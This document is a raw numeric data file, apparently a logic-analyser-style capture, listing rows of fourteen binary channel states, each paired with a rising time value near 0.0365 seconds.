0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414496e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414520e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414548e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6538704e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6538908e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,3.6538936e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6538960e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6539244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6539272e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6539296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6539320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6539372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6539396e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,1,3.6539400e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,3.6539404e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,3.6539444e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,3.6539472e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6539476e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6539524e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6539536e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6539540e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6539572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6539596e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6539620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6539644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6539652e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6539696e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6539724e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6539728e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6539732e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6539772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6539796e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.6539800e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6539804e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6539820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6539844e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6539868e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6539896e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6539920e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6539948e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6539952e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6539956e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6539996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540068e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6540076e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6540124e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6540148e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6540152e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540156e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540296e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540348e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540496e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540520e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540620e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6540628e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6540672e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6540696e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6540700e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540704e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540748e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540920e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6540972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6540996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541068e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541120e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541268e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541276e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6541324e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541356e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541496e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541500e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6541548e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541580e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541672e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541696e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541700e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6541724e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541748e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6541752e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541756e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541852e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6541896e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6541924e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6541928e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541932e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6541972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6541996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542096e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542100e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542124e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542148e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542172e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542196e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542220e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542244e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542268e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542300e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542344e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542468e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542496e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542520e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542668e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542696e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542720e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542744e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542772e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6542852e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6542896e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542924e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542944e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6542972e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6542996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543020e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6543044e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543076e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543144e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543296e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543344e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543348e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6543396e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543428e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543468e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543496e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543520e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543668e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543696e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543720e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543724e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6543772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543804e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6543896e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6543924e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.6543948e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6543952e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6543996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544028e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544096e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544100e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6544124e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544148e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6544172e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544196e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6544220e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544252e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544324e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544376e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6544420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544452e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544472e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544496e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544524e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544620e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544628e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6544644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544676e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544696e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544720e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544748e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6544868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6544924e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.6544948e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6544952e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6544996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545028e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545096e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545196e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545200e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6545244e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545272e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545276e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545324e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,3.6545348e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545352e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6545372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545396e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6545420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545444e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6545468e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6545496e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6545500e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545504e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545548e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545668e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545696e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545720e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545748e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545920e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6545972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6545996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546068e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546120e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546268e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546300e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6546396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6546424e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6670608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6670772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6670796e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,3.6670820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6670844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6671148e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6671172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6671196e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.6671228e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,3.6671248e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.6671276e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,3.6671300e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.6671324e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,3.6671348e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.6671372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6671380e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6671428e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671440e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671448e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671500e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6671504e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6671524e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6671548e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6671572e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6671596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671628e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671648e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671676e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671700e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671724e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671748e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6671756e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6671800e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6671828e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671832e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671852e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6671876e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6671880e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6671924e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6671948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671956e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6671972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6671996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672024e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672048e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672076e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672100e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672224e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672248e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672300e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672348e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6672352e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6672356e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6672372e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6672396e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6672424e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6672448e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6672476e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6672500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672508e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672548e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672572e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672624e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672648e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672676e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672796e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672824e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672848e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672876e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6672972e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6672996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673024e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673028e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6673076e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673108e-02 